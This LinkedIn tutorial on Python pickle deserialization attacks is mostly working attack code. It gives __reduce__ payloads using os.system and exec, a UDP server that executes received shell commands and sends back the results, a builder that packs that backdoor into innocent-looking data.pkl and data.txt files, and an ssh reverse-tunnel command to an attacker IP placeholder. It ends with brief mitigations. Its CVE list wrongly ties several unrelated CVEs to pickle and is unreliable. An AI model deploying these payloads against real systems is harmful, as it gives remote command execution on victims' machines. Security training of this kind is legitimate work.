登录查看更多内容

Python Deserialization Attack: How to Build a Pickle Bomb

Yuancheng Liu

Head of Technology at National Cybersecurity R&D Laboratories SG

发布日期: 2024年7月7日

This article will introduce an old and classic unsecured Python data serialization feature (the pickle library) and demonstrates how a red team attacker can exploit it to create a malicious binary or text data file that executes remote code or commands upon deserialization. The following attack flow diagram illustrates this process:

Figure-00: Python Deserialization Attack Flow diagram, version v0.0.3 (2024

We will follow 3 steps with the program code to show how Deserialization Attacks Work:

[ Step1 ] Crafting Malicious Data: An attacker crafts a malicious payload that, when deserialized, will execute code on the target system. This payload often takes advantage of the inherent trust the deserialization process has in the incoming data.
[ Step2 ] Injection: The attacker injects the malicious payload into the application, typically through input fields, network requests, or other data sources.
[ Step3 ] Execution: The application deserializes the malicious data, triggering the execution of the embedded code. This can lead to arbitrary code execution, compromising the system's security.

Important: All the scripts provided are intended for cybersecurity research and training purposes only. Do not use them to attack real-world systems.

Introduction

Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. There are several Common Vulnerabilities and Exploits (CVEs) related the Python pickle Deserialization Vulnerabilities:

CVE-2011-3389: Untrusted data passed to pickle deserialization can execute arbitrary code.
CVE-2019-5021: The pickle module in Python is vulnerable to arbitrary code execution due to unsafe deserialization.
CVE-2018-1000802: A deserialization vulnerability in the pickle module can be exploited to execute arbitrary code.
CVE-2019-9636: Insecure loading of a pickle-based format in the Pandas library can lead to arbitrary code execution.
CVE-2019-20907: Improper handling of serialized data leading to potential arbitrary code execution.
CVE-2024-34997: critical deserialization vulnerability identified in joblib version 1.4.2, specifically in the NumpyArrayWrapper().read_array() component within the joblib.numpy_pickle module.

Introduction of Python Data Serialization

In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:

# An example data structure that cannot be converted to JSON, YAML, or XML format.
from collections import OrderedDict
data = OrderedDict({
    'Timestamp': '2023-04-05 16:00:00',
    'IoTData': {
        'IP': '172.23.155.209',
        'Port': 3001,
        'value': [1.2, 1.3, 1.4],
        'RptPeer': {
            'Hub1': 1.2,
            'Hub2': 1.3
        },
        'CfgSet': set(['CT100', 'COM3', 3])  # set data is not support by json
    }
})

For such complex data objects, formats like JSON, YAML, or XML are not suitable. In these cases, the pickle library provides a convenient way to serialize and deserialize data. The pickle module can convert complex Python objects into a byte stream (serialization) and then convert the byte stream back into the original objects (deserialization).

import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)

Using pickle.dumps() allows you to serialize the data into bytes, making it easy to save to a file or transfer over a network. The pickle.loads() function can then be used to deserialize the bytes back into the original data structure. The object can be dump and load are shown below:

Figure-01: Python can be pickled type, version v0.0.3 (2024)

This capability is particularly useful for storing or transmitting complex Python objects that are not compatible with simpler serialization formats.

Introduction of Python Deserialization Vulnerabilities

While using the Python pickle module to serialize and deserialize data is convenient, but it is insecure when handling untrusted data. The official Python documentation highlights this risk:

Figure-02: Python Pickle Doc Warning message, version v0.0.3 (2024)

The pickle module can serialize and deserialize Python objects, but it has the capability to execute arbitrary code during deserialization. This feature can be exploited by attackers to run malicious code on the target system. A simple way to create a pickle bomb involves using an object with a custom __reduce__() method as shown in the pickle doc:

Figure-03: Python object._reduce__() function document, version v0.0.3 (2024)

The __reduce__() function can return an executable function along with related parameters. When the data is deserialized, the function will be executed. Here is an example of a simple serialized data loader that can load both binary and text format data:

# A normal pickle serialized data file load program (version v0.0.2)
import pickle
import base64
while True:
    choice = input("Input load serialized data file format([1] byte file, [2] txt file):")
    if choice == '1':
        orignalData = None
        with open('data.pkl', 'rb') as fh:
            orignalData = pickle.load(fh)
        print(orignalData)
    elif choice == '2':
        dataStr = None
        with open('data.txt', 'r') as fh:
            dataStr = fh.read()
        orignalData = pickle.loads(base64.b64decode(dataStr))
        print(orignalData)
    else:
        print("Exit....")
        exit()

Link to download Full Pickled data load program : pickleBombLoader.py

To build a simple Python pickle bomb, we can over write the __reduce__() method to return the os.system function with a command string. This way, when the data loader reads the data file, it will execute the command:

import os
import pickle
import base64

# a simple picle bomb to run command
class PickleCmd:
    def __reduce__(self):
        cmd = ('uname -a')
        return os.system, (cmd,)    
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

When we run this script, it will create two data files: a binary data file (`data.pkl`) and a text data file (`data.txt`). Using the loader to read these files will execute the command, demonstrating how the system information can be retrieved:

Figure-04: Simple python bomb execution result, version v0.0.3 (2024)

With the ability to execute commands, an attacker can integrate harmful actions, such as deleting files or retrieving credential information. This highlights the severe risk of deserializing untrusted data with the pickle module. Always ensure that serialized data is from a trusted source to avoid such vulnerabilities.

Build Python Pickle Boom

In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.

Clarification on Command Execution

Before we proceed, it's important to clarify how commands can be executed within the __reduce__() function. Consider the following modification:

class PickleCmd:
    def __reduce__(self):
        os.system('date')
        os.system('ifconfig')
        with open('testfile.txt', 'w') as fh:
            fh.write("Test file contents")
        cmd = ('uname -a')
        return os.system, (cmd,)

If we reload the new pickle bomb, you can see that the additional commands are not executed:

Figure-05: Simple python bomb excution result, version v0.0.3 (2024)

Only the function returned by __reduce__() is executed. To perform more complex tasks, such as running commands on the victim's machine, we can use a reverse shell command. For example:

cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')

However, this method exposes the red team attacker's IP address in the command logs. If we want to run more complex Python programs without exposing this information, we can use the exec() function. The exec() function allows you to execute arbitrary Python code from a string or compiled code input. It is useful for running dynamically generated Python code, though it should be used cautiously due to its potential risks.

领英推荐

Here's an explanation of why ethical hackers love…

Mohan Nayak 10 个月前

Your Survival Guide to Python for Cybersecurity Pros

Dr. Allen Harper 5 个月前

Implementing Asymmetric Encryption in Python with RSA

Yamil Garcia 4 个月前

Improving the Pickle Bomb Program

Let's improve our pickle bomb program to return the exec function and a piece of Python code in the __reduce__() function:

import pickle
import base64

codeContent="""
with open('testfile.txt', 'w') as fh:
    fh.write("Test file contents")
"""
# a simple picle bomb to run command
class PickleCode:
    def __reduce__(self):
        return exec, (codeContent,)
    
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

After loading the data file, you will see that the Python code to create a file is executed:

Figure-06: Improved python bomb execution result, version v0.0.3 (2024)

By leveraging the exec() function, we can execute more complex and dynamic Python code, making the pickle bomb more powerful and versatile for demonstrating security vulnerabilities in the deserialization process. Remember, this information is for educational purposes only and should not be used for malicious activities.

Building a More Complex Python Pickle Bomb

In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes the code, and returns the results to the sender. This method ensures that the red team's IP address is not exposed, even if the bomb is discovered.

Here is the UDP server program:

# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096 
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
    data, address = udpServer.recvfrom(BUFFER_SZ)
    cmdMsg = data.decode('utf-8')
    if cmdMsg == '': continue
    if cmdMsg == 'exit': exit()
    result = 'Command not found!'
    try:
        result = subprocess.check_output(cmdMsg, shell=True).decode()
    except Exception as err:
        result = str(err)
    udpServer.sendto(result.encode('utf-8'), address)

Link to download UDP command execution server program: udpCmdServer.py

Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:

# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64

# Serilized file:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None 
with open(fileName, 'r') as fh:
    dataStr = fh.read()

class PickleBomb:
    def __reduce__(self):
        pass
        return exec, (dataStr,)

obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)

with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)

dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)

Link to download Full Pickle Bomb Builder Program: pickleBombBuilder.py

Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:

We can then use a simple UDP client program to connect to the victim's IP address and run commands:

Link to download Full UDP client program (udpCom.py)

As shown, we can check the folder structure and network information of the victim.

Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.

Mitigations of Python Deserialization Attack

To avoid the Python Deserialization Attack happen, there are several points we can follow:

1. Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.

2. Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.

3. Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.

4. Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.

Conclusion and Reference

Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.

Reference:

Demo Step and Program execution

For downloading the programs to try the demo, please follow the Program Setup and Program Execution section in this link:

https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/pickleBomb

# Created:     2024/07/06
# Version:     v0.1.1
# Copyright:   Copyright (c) 2024 LiuYuancheng
# License:     MIT License

Thanks for spending time to check the article detail, if you have any question and suggestion or find any program bug, please feel free to message me. Many thanks if you can give some comments and share any of the improvement advice so we can make our work better ~

Michael A.

Hardware and OT Security Researcher

8 个月

This is a really great, detailed explanation. Thank you for taking the time to write something of this quality, for free. I hope you continue to make more like it, for other serialization exploits etc. ??

3 次回应

查看更多评论

要查看或添加评论，请登录

Yuancheng Liu的更多文章

Creating an MCP Agent with Local/LAN DeepSeek Service for Browser Control

2025年3月23日

Creating an MCP Agent with Local/LAN DeepSeek Service for Browser Control

In this article, we explore how to build an AI-driven Model Context Protocol (MCP) Agent that can help user to operate…

4 条评论
Use a Simple Web Wrapper to Share the Local Deep Seek-R1 Model Service to LAN Users

2025年3月2日

Use a Simple Web Wrapper to Share the Local Deep Seek-R1 Model Service to LAN Users

In the previous article Deploying DeepSeek-R1 Locally with a Custom RAG Knowledge Data Base, we introduced the detail…

4 条评论
Deploying DeepSeek-R1 Locally with a Custom RAG Knowledge Data Base

2025年2月9日

Deploying DeepSeek-R1 Locally with a Custom RAG Knowledge Data Base

The primary goal of this article is to explore how to deploy the popular open-source large language model (LLM)…

6 条评论
3D Visualize Your GitHub Yearly Contributions Matrix

2025年1月26日

3D Visualize Your GitHub Yearly Contributions Matrix

This article will introduce a very simple way to transform your yearly contributions matrix into a stunning 3D skyline…

1 条评论
Power Grid Simulation System 02 : S7Comm FDI Power Outage Attack Case Study

2025年1月12日

Power Grid Simulation System 02 : S7Comm FDI Power Outage Attack Case Study

We are excited to share that the Power Grid Simulation System (version v_0.1.

9 条评论
SIEM Big Data Visualization [05] : P2PComm_GeoTopology_Map_Plugin_App

2024年12月22日

SIEM Big Data Visualization [05] : P2PComm_GeoTopology_Map_Plugin_App

This article will introduce the Peer to Peer Communication Geolocation Topology Map Plugin App developed for SIEM big…
Python PLC Honeypot 02: System Deployment and Attack Detection

2024年12月1日

Python PLC Honeypot 02: System Deployment and Attack Detection

After explored the design principles of the Python PLC Honeypot Project last week, this follow-up article provides the…

15 条评论
Python PLC Honeypot Project

2024年11月24日

Python PLC Honeypot Project

This article will give a general introduction about the Python PLC Honeypot System we developed for cyber security…

32 条评论
SIEM Big Data Visualization [04] : Data Transmission Latency SIEM Log Analysis Dashboard

2024年11月3日

SIEM Big Data Visualization [04] : Data Transmission Latency SIEM Log Analysis Dashboard

This article will introduce the Data Transmission Latency Log Analysis Dashboard developed for SIEM big data analytics.…
SIEM Big Data Visualization [03]: Graph-Based SIEM Log Analysis Dashboard

2024年10月27日

SIEM Big Data Visualization [03]: Graph-Based SIEM Log Analysis Dashboard

In this article, I will introduce the Graph-Based SIEM Log Analysis Dashboard (angular plugin) developed for SIEM big…

4 条评论

See all articles

Python Deserialization Attack: How to Build a Pickle Bomb

Yuancheng Liu

Head of Technology at National Cybersecurity R&D Laboratories SG

Introduction

Introduction of Python Data Serialization

Introduction of Python Deserialization Vulnerabilities

Build Python Pickle Boom

Clarification on Command Execution

领英推荐

Improving the Pickle Bomb Program

Building a More Complex Python Pickle Bomb

Mitigations of Python Deserialization Attack

Conclusion and Reference

Demo Step and Program execution

Yuancheng Liu的更多文章

社区洞察

其他会员也浏览了

Create Your Own Custom Encryption in Python

Adventures in Python Multi-Processing and DNS

When Python Developed a Venom and Slithers and Scares the Shi* Out of Developers

How to send Gmail using python???

Exploiting Hidden Ports Using Python & Directory Traversal | TryHackMe Airplane CTF

Python Security: Best Practices for Developers

Python for Dark Web OSINT: Automate Threat Monitoring

Exploring Network Vulnerabilities with a Custom Python-based Network Scanning Tool

A malicious Python package conceals the Sliver C2 Framework in the library logo of fake requests.

Python is Extremely Important for Cyber Security Analysts!

Introduction

Introduction of Python Data Serialization

Introduction of Python Deserialization Vulnerabilities

Build Python Pickle Boom

Clarification on Command Execution

领英推荐

Improving the Pickle Bomb Program

Building a More Complex Python Pickle Bomb

Mitigations of Python Deserialization Attack

Conclusion and Reference

Demo Step and Program execution

Yuancheng Liu的更多文章

Creating an MCP Agent with Local/LAN DeepSeek Service for Browser Control

Use a Simple Web Wrapper to Share the Local Deep Seek-R1 Model Service to LAN Users

Deploying DeepSeek-R1 Locally with a Custom RAG Knowledge Data Base

3D Visualize Your GitHub Yearly Contributions Matrix

Power Grid Simulation System 02 : S7Comm FDI Power Outage Attack Case Study

SIEM Big Data Visualization [05] : P2PComm_GeoTopology_Map_Plugin_App

Python PLC Honeypot 02: System Deployment and Attack Detection

Python PLC Honeypot Project

SIEM Big Data Visualization [04] : Data Transmission Latency SIEM Log Analysis Dashboard

SIEM Big Data Visualization [03]: Graph-Based SIEM Log Analysis Dashboard

社区洞察

其他会员也浏览了

Create Your Own Custom Encryption in Python

Adventures in Python Multi-Processing and DNS

When Python Developed a Venom and Slithers and Scares the Shi* Out of Developers

How to send Gmail using python???

Exploiting Hidden Ports Using Python & Directory Traversal | TryHackMe Airplane CTF

Python Security: Best Practices for Developers

Python for Dark Web OSINT: Automate Threat Monitoring

Exploring Network Vulnerabilities with a Custom Python-based Network Scanning Tool

A malicious Python package conceals the Sliver C2 Framework in the library logo of fake requests.

Python is Extremely Important for Cyber Security Analysts!